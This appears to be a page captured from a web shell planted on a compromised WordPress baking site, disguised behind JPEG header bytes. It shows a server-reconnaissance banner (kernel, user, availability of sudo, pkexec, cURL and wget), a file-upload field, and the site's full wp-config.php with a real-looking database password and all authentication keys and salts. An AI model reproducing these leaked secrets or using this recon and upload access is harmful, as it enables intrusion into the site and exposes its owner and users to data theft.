????JFIF??H?H????Exif??MM?*???? ??3????V?????3??????3?(????????????????????3?????
Server IP : 127.0.1.1 / Your IP : 216.73.216.108 Web Server : nginx/1.21.4 System : Linux mybakingdom 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 x86_64 User : administrator ( 1001) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/administrator/htdocs/mybakingdom.com/ |
Upload File : |
<?php define('WP_CACHE', true); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'mybakingdom' ); /** Database username */ define( 'DB_USER', 'mybakingdom' ); /** Database password */ define( 'DB_PASSWORD', 'wJrPOq7MP7gstQJKudia' ); /** Database hostname */ define( 'DB_HOST', '127.0.0.1:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'l[Ymi+#ixgC3+%G=rjZ6dxy**]ZG#$Tl1vAf>;23m,B)=7B`ADBQ-Fm:tX9E/S<U' ); define( 'SECURE_AUTH_KEY', 'ebGF3>ch[-mm=C7s1{J0FCg)k,$N_s,lzK7z1m]uAuU8[xz:t@(&PgJH+lhMFS]E' ); define( 'LOGGED_IN_KEY', 'dsla5~+DKX+n`DuMm/L]U1}uu=*zB1}zSgX_>_3zgu#}:6K>^H+II[>wnx=UjT[P' ); define( 'NONCE_KEY', '$is~_k{A42UE1~WNcT{4YYS5ao9efxkW.Xr[yD)>Hlj=IgIQK4T%-=`|Kh(v+UwW' ); define( 'AUTH_SALT', 'NS1m+CGLn$1+]}^Q|kxE2NbMn#kASq+pY<yT<(!F8],iIYdO[oJhs3aS]%@7G~7=' ); define( 'SECURE_AUTH_SALT', 'xJrQH?+25AIXZ//q7H&tR[]^Q5||.N=Gc>5YF*?WBP >R<A0C6}Dms`%v0JTd*Mq' ); define( 'LOGGED_IN_SALT', 'wx3sk`5yp5,6)emWO78DAU]?m9*W#QQB]<E)[/nTJ$|lY0!{|>Sci/&~FStImW8 ' ); define( 'NONCE_SALT', ':Ow&X{#xIeA7HF(sXlzTfHpDEP)J!;=`nxdR/v?|:vNxsM5Fybt%[^J0}^ JR[/Y' ); define( 'WP_CACHE_KEY_SALT', 'OK+^SAmL6G29xvp 1Sro`^k{,{W$!}8Mup_ugUqqnYC<I4bqG*o),6XQV&6SlYnI' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define( 'FS_METHOD', 'direct' ); define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_DEBUG_LOG', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'AUTOSAVE_INTERVAL', 600 ); define( 'WP_POST_REVISIONS', 5 ); define( 'EMPTY_TRASH_DAYS', 21 ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';